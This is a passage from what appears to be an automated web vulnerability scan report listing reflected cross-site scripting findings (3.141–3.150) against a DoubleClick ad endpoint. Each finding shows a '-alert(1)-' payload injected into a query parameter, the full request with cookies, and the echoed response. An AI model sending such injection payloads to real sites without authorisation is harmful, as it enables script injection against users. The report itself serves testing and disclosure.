This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=22b324'-alert(1)-'1aa36b96c8d&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
3B0%3B61499020%3B4307-300/250%3B41885690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=22b324'-alert(1)-'1aa36b96c8d&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&p
...[SNIP]...

3.141. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [p parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74e14"-alert(1)-"d476ec4b721 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=274e14"-alert(1)-"d476ec4b721&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
3B0%3B61499020%3B4307-300/250%3B41885690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=274e14"-alert(1)-"d476ec4b721&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&p
...[SNIP]...

3.142. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pdom parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d8f4'-alert(1)-'4276b68460c was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com7d8f4'-alert(1)-'4276b68460c&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
0686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com7d8f4'-alert(1)-'4276b68460c&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.blackberry.com">
...[SNIP]...

3.143. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pdom parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f831a"-alert(1)-"fd41ddc67fd was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.comf831a"-alert(1)-"fd41ddc67fd&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54542

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
0686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.comf831a"-alert(1)-"fd41ddc67fd&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";
this.clickN = "0";
this.type = type;
this.uniqueId =
...[SNIP]...

3.144. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cbc0"-alert(1)-"ba0ac0d227c was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY6cbc0"-alert(1)-"ba0ac0d227c&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
1&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY6cbc0"-alert(1)-"ba0ac0d227c&t=2011.04.27.23.14.45&event=58/";
this.clickN = "0";
this.type = type;
this.uniqueId = plcrInfo_1303848426617.uniqueId;
this.thirdPartyI
...[SNIP]...

3.145. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ec98'-alert(1)-'6c46995427c was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY6ec98'-alert(1)-'6c46995427c&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
1&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY6ec98'-alert(1)-'6c46995427c&t=2011.04.27.23.14.45&event=58/http://www.blackberry.com">
...[SNIP]...

3.146. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c129e'-alert(1)-'a18cc8e1ddf was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=c129e'-alert(1)-'a18cc8e1ddf&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54539

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=c129e'-alert(1)-'a18cc8e1ddf&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.2
...[SNIP]...

3.147. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49479"-alert(1)-"b2ea1892855 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=49479"-alert(1)-"b2ea1892855&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54536

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
41903486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=49479"-alert(1)-"b2ea1892855&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.2
...[SNIP]...

3.148. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3537'-alert(1)-'9e6d81f8f7a was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100f3537'-alert(1)-'9e6d81f8f7a&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54542

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
kv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100f3537'-alert(1)-'9e6d81f8f7a&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/htt
...[SNIP]...

3.149. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f493"-alert(1)-"02b8d42dafa was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=1009f493"-alert(1)-"02b8d42dafa&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54542

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
kv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=1009f493"-alert(1)-"02b8d42dafa&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";

...[SNIP]...

3.150. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [ppartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9df1a'-alert(1)-'d8d0b082069 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept at